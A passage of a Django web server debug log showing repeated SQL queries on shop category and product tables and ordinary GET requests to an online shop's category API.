"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:48:20,674 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:48:20,679 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:48:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:48:20,823 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 09:48:20,831 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [18/Dec/2019 09:48:20] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 09:48:23,004 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:48:23,010 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:48:23] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:49:36,553 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:49:36,559 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:49:36] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 09:52:54] "GET / HTTP/1.0" 302 0 [18/Dec/2019 09:57:57] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:11:14] "GET / HTTP/1.0" 302 0 [18/Dec/2019 10:19:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 10:19:48,948 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 10:19:48,954 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 10:19:48,958 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 10:19:48,960 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 10:19:48,964 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 10:19:48,966 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 10:19:48,968 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 10:19:48,970 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 10:19:48,973 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 10:19:48,976 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 10:19:48,978 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 10:19:48,980 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 10:19:48,983 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 10:19:48,985 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 10:19:48,989 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 10:19:48,991 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 10:19:48,993 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 10:19:48,995 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 10:19:48,998 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 10:19:49,001 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 10:19:49,003 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 10:19:49,006 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 10:19:49,008 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 10:19:49,010 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 10:19:49,012 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 10:19:49,016 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 10:19:49,018 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 10:19:49,020 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 10:19:49,024 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 10:19:49,028 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 10:19:49,035 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 10:19:49,039 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 10:19:49,042 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 10:19:49,046 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 10:19:49,050 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 10:19:49,057 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 10:19:49,061 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 10:19:49,065 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 10:19:49,069 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 10:19:49,073 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 10:19:49,076 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 10:19:49,082 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 10:19:49,086 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 10:19:49,090 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 10:19:49,095 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 10:19:49,099 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 10:19:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 10:19:57,824 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 10:19:57,835 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 10:19:57,842 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 10:19:57,846 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 10:19:57,852 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 10:19:57,856 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 10:19:57,861 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 10:19:57,865 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 10:19:57,871 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 10:19:57,879 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 10:19:57,884 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 10:19:57,888 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 